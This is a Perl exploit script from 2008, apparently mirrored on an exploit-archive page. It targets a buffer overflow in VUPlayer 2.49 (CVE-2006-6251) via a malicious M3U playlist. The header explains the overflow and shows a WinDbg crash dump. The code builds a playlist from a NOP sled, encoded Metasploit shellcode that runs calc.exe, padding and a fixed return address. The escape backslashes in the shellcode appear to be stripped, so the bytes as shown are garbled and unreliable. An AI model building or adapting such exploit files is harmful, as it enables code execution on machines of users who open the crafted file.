Home / exploitsPDF  

vuplayer_bof.pl.txt

Posted on 18 August 2008

#!/usr/bin/perl
#
# Title: VUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit
#
# Summary: VUPlayer is a freeware multi-format audio player for Windows
#
# Product web page: http://www.vuplayer.com/vuplayer.php
#
# Desc: VUPlayer 2.49 suffers from buffer overflow vulnerability that can be
# exploited remotely using user intereaction or crafting. It fails to perform
# adequate boundry condition of the user input file (1016 bytes), allowing us
# to overwrite the EIP, ECX and EBP registers. Successful exploitation executes
# calc.exe, failed  attempt resolve in DoS.
#
#
# ---------------------------------WinDbg-------------------------------------
#
# (e7c.c40): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000001 ecx=41414141 edx=00da5c98 esi=0050b460 edi=0012ee24
# eip=41414141 esp=0012eab8 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
# 41414141 ??              ???
#
# ----------------------------------------------------------------------------
#
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Vulnerability discovered by Greg Linares & Expanders in version 2.44 (2006)
#
# Refs:
#
# - cVE: CVE-2006-6251
# - MILW0RM:2872
# - MILW0RM:2870
# - CERT-VN:VU#311192
# - BID:21363
# - FRSIRT:ADV-2006-4783
# - SECUNIA:23182
# - XF:vuplayer-plsm3u-bo(30629)
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail.com
#
# http://www.zeroscience.org
#
# 18.08.2008
#


print "

";
print "=" x 80;
print "

";
print "	VUPlayer 2.49 M3U Playlist File Remote Buffer Overflow Exploit
";
print "		 by LiquidWorm <liquidworm [at] gmail.com>


";
print "=" x 80;

# win32_exec -  EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com

$SHELLCODE = "xebx03x59xebx05xe8xf8xffxffxff".
"x4fx49x49x49x49x49x49x51x5ax56".
"x54x58x36x33x30x56x58x34x41x30".
"x42x36x48x48x30x42x33x30x42x43".
"x56x58x32x42x44x42x48x34x41x32".
"x41x44x30x41x44x54x42x44x51x42".
"x30x41x44x41x56x58x34x5ax38x42".
"x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x30x42x30x42x50x4bx48x45x34".
"x4ex43x4bx58x4ex57x45x30x4ax57".
"x41x50x4fx4ex4bx58x4fx54x4ax31".
"x4bx58x4fx45x42x52x41x30x4bx4e".
"x49x54x4bx48x46x53x4bx38x41x30".
"x50x4ex41x53x42x4cx49x49x4ex4a".
"x46x38x42x4cx46x37x47x50x41x4c".
"x4cx4cx4dx50x41x50x44x4cx4bx4e".
"x46x4fx4bx53x46x45x46x32x46x50".
"x45x57x45x4ex4bx38x4fx55x46x52".
"x41x30x4bx4ex48x36x4bx58x4ex30".
"x4bx54x4bx58x4fx55x4ex51x41x50".
"x4bx4ex4bx38x4ex51x4bx38x41x30".
"x4bx4ex49x38x4ex35x46x52x46x30".
"x43x4cx41x33x42x4cx46x36x4bx38".
"x42x54x42x53x45x58x42x4cx4ax37".
"x4ex50x4bx58x42x34x4ex30x4bx58".
"x42x47x4ex31x4dx4ax4bx48x4ax36".
"x4ax30x4bx4ex49x50x4bx38x42x38".
"x42x4bx42x50x42x50x42x30x4bx38".
"x4ax36x4ex53x4fx55x41x53x48x4f".
"x42x46x48x35x49x48x4ax4fx43x38".
"x42x4cx4bx57x42x35x4ax36x4fx4e".
"x50x4cx42x4ex42x56x4ax56x4ax39".
"x50x4fx4cx48x50x50x47x35x4fx4f".
"x47x4ex43x36x41x56x4ex36x43x36".
"x50x32x45x36x4ax57x45x46x42x50".
"x5a";


$FILE = "TETOVIRANJE.m3u";

$GARBAGE = "x4A" x 461;

$NOPSLED = "x90" x 200;

$RET = "xC0xE6x12x00";

print "

[-] Buffering malicious playlist file. Please wait...
";

sleep (5);

open (BOF, ">./$FILE") || die "
Can't open $FILE: $!";

print BOF "$NOPSLED" . "$SHELLCODE" . "$GARBAGE" . "$RET";

close (BOF);

print "

[+] File $FILE successfully created!

";

system (pause);

 

TOP

Malware :

Exploits :